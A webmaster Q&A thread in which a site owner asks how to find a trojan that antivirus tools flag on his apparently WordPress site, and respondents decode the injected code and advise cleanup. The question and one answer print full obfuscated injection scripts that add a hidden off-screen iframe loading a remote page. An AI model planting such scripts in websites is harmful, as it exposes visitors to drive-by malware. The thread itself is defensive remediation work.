: Hidden Trojan on my wesbite - How to find it? I have a big problem. Kaspersky says my website is infected with trojan. So I downloaded all my website and run a scan and it was clean. I
I have a big problem. Kaspersky says my website is infected with trojan. So I downloaded all my website and run a scan and it was clean. I also did a clamav on it and it was clean too.
So next thing I told few guys to test it and when they go to my website the warning appear, not only Kaspersky but Norton too.
I think it's a hidden trojan, like when you refresh the page you see the warning while it's hidden in files.
Kaspersky gave me the following code
<script type='text/javascript'>/*<![CDATA[*/var wow="b3nimb2eawiki11b1infob1ms";c1="l"+"on"+"l"+"y ";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c 2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.i ndexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").a ppendChild(a)};/*]]>*/</script>
So now I am lost, what can i do?
More posts by @Steve110
4 Comments
Sorted by latest first Latest Oldest Best
This depends mostly on the CMS (if any exists). I would go on the website root and made something like:
grep -lr b3nimb2eawiki11b1infob1ms *
as b3nimb2eawiki11b1infob1ms seems to be the signature of this malware.
Second step, I would look on the database for such string too (phpMyAdmin has a feature for this, for example) looking in all tables/fields.
Once found delete the malicious code, probably there are more than just one file/record, so the work needed to clean this could vary accordingly. Once you find where you were hacked, try to find why, and secure your server code!
The reported URL f1arab.com does not contain this piece of JS code at first sight.
So, looking at the script we can figure out what it is trying to sent you to:
var wow = "b3nimb2eawiki11b1infob1ms"; var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l"; document.write(url);
which yields:
anime-wiki11.info.ms:81/rem2.html
Let's query this URL, twice, we see on the first that it can't find a page on Yahoo and the second can't load this. As you search the b3nimb2eawiki11b1infob1ms string on Google you see that these exploit attempts are quite dated, and it appears that Yahoo already took them offline.
Searching for the URL you obtain, you see my attempts to query it as well as two sites also infected with this script. But as it shows, the script is no longer harmful so it is safe to visit both URLs assuming Yahoo doesn't put it back.
When doing yet another check with urlQuery on the reported URL we see this request happening:
GET /rem2.html HTTP/1.1
Host: mrzwheremeread.info.br.ms:81
But once again this URL leads to something Yahoo already took offline.
The interesting thing is that this is different from the URL shown in your question, thus it is being dynamically generated. So that's why a quick search earlier on did not find the JS code.
This is evidenced by the following HTML code being injected at a certain point:
<script type="text/javascript">/*<![CDATA[*/var wow="mrzwhb2rb2mb2rb2b3db1infob1brb1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>
As we can see on urlQuery that this code isn't being injected through JavaScript, this must be happening server side. What we also see here through wp-content is that you are using WordPress, so it most likely that they are using a WordPress exploit to insert that code.
Start byupdating WordPress and the plugins, as well as disabling things that you don't need. From there on, you can look into making file permissions a bit more restrictive on the server; as well as PHP settings to disallow writing from / to places you don't want to.
Also, search for var wow or just wow over all hosted files on the server would be a nice approach as that seems to be not dynamic, please note that it might appear in an encrypted form which might require you to search manually...
You can also scan your site at sitecheck.sucuri.net/scanner/
Common forms of malware inject php code into your index.php files which generate the javascript. The PHP doesn't look like the javascript, it may be base64 encoded it may not.
It's also possible you have rogue php files on your site inserting the code into your index files as well. In that case you need to find those files. Good hosting companies can scan your account quickly to find backdoor shells.
If you run WordPress it may also be coming from entries in your database.
You obviously need to do two things:
Find all instances of that code on your site and remove it
Find out how you got hacked in the first place and fix it. If you're using a CMS upgrade to the latest version immediately. If you still get hacked then a backdoor has been installed on your site and you'll need to completely remove all of your site's files and re-install your CMS from scratch (after doing a backup of your database).
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.